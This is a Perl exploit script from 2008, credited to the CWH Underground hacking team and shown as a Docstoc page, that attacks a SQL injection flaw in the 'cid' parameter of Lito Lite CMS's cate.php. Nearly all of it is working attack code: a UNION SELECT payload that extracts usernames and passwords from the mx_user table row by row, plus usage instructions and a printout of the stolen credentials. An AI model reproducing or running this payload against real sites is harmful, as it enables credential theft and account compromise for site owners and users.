Lito Lite CMS cate.php cid Remote SQL Injection Exploit

Document Sample
Lito Lite CMS cate.php cid Remote SQL Injection Exploit Powered By Docstoc
					                             Lito Lite CMS cate.php cid Remote SQL Injection Exploit               Page 1/2
  1    #!/usr/bin/perl −w
  2    #===========================================================
  3    # Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit
  4    #===========================================================
  5    #
  6    # ,−−^−−−−−−−−−−,−−−−−−−−,−−−−−,−−−−−−−^−−,
  7    # | |||||||||     ‘−−−−−−−−’     |          O    .. CWH Underground Hacking Team ..
  8    # ‘+−−−−−−−−−−−−−−−−−−−−−−−−−−−^−−−−−−−−−−|
  9    #    ‘\_,−−−−−−−, _________________________|
  10   #       / XXXXXX /‘|      /
  11   #     / XXXXXX / ‘\     /
  12   #    / XXXXXX /\______(
  13   #   / XXXXXX /
  14   # / XXXXXX /
  15   # (________(
  16   # ‘−−−−−−’
  17   #
  18   #AUTHOR : CWH Underground
  19   #DATE : 29 November 2008
  20   #SITE : cwh.citec.us
  21   #
  22   #
  23   #####################################################
  24   #APPLICATION : Lito Lite CMS
  25   #DOWNLOAD     : http://www.lovedesigner.net/files/download/lito_lite.zip
  26   ######################################################
  27   #
  28   #Note: magic_quotes_gpc = off
  29   #
  30   #######################################################################################
  31   #Greetz       : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
  32   #Special Thx : asylu3, str0ke, citec.us, milw0rm.com
  33   #######################################################################################
  34
  35
  36   use LWP::UserAgent;
  37   use HTTP::Request;
  38
  39   if ($#ARGV+1 != 2)
  40   {
  41      print "\n==============================================\n";
  42      print " Lito Lite Remote SQL Injection Exploit \n";
  43      print "                           \n";
  44      print "        Discovered By CWH Underground     \n";
  45      print "==============================================\n";
  46      print "                           \n";
  47      print " ,−−^−−−−−−−−−−,−−−−−−−−,−−−−−,−−−−−−−^−−, \n";
  48      print " | ||||||||| ‘−−−−−−−−’ |     O                   \n";
  49      print " ‘+−−−−−−−−−−−−−−−−−−−−−−−−−−−^−−−−−−−−−−| \n";
  50      print " ‘\_,−−−−−−−, _________________________| \n";
  51      print "      / XXXXXX /‘| /              \n";
  52      print " / XXXXXX / ‘\ /                  \n";
CWH Underground                                                                                    11/29/2008
                               Lito Lite CMS cate.php cid Remote SQL Injection Exploit                                                 Page 2/2
  53       print " / XXXXXX /\______(                    \n";
  54       print " / XXXXXX /                         \n";
  55       print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
  56       print " (________(                      \n";
  57       print " ‘−−−−−−’                        \n";
  58       print "                            \n";
  59       print "Usage : ./xpl.pl <Target> <Data Limit>\n";
  60       print "Example: ./xpl.pl http://www.target.com/lito_lite 10\n";
  61       exit();
  62   }
  63
  64   $target = ($ARGV[0] =~ /^http:\/\//) ?                $ARGV[0]:       ’http://’ . $ARGV[0];
  65   $number = $ARGV[1];
  66
  67   print   "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
  68   print   "\n ..:: SQL Injection Exploit By CWH Underground ::.. ";
  69   print   "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
  70   print   "\n[+]Dump Username and Password\n";
  71
  72   for ($start=0;$start<$number;$start++) {
  73
  74   $xpl = LWP::UserAgent−>new() or die "Could not initialize browser\n";
  75   $req = HTTP::Request−>new(GET => $target."/cate.php?cid=1%27%20and%201=2%20union%20select 1,2,3,concat(0x3a3a3a,username,0x3a3a,password,0x
       3a3a3a),5,6,7,8,9,10%20from%20mx_user%20limit%201%20offset%20".$start."−−+and+1=1")or die "Failed to Connect, Try again!\n";
  76   $res = $xpl−>request($req);
  77   $info = $res−>content;
  78   $count=$start+1;
  79
  80   if ($info =~ /:::(.+):::/)
  81   {
  82   $dump=$1;
  83   ($username,$password)= split(’::’,$dump);
  84   printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
  85   }
  86   else {
  87           print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
  88           exit;
  89   }
  90   }
  91
  92   # milw0rm.com [2008−11−29]




CWH Underground                                                                                                                        11/29/2008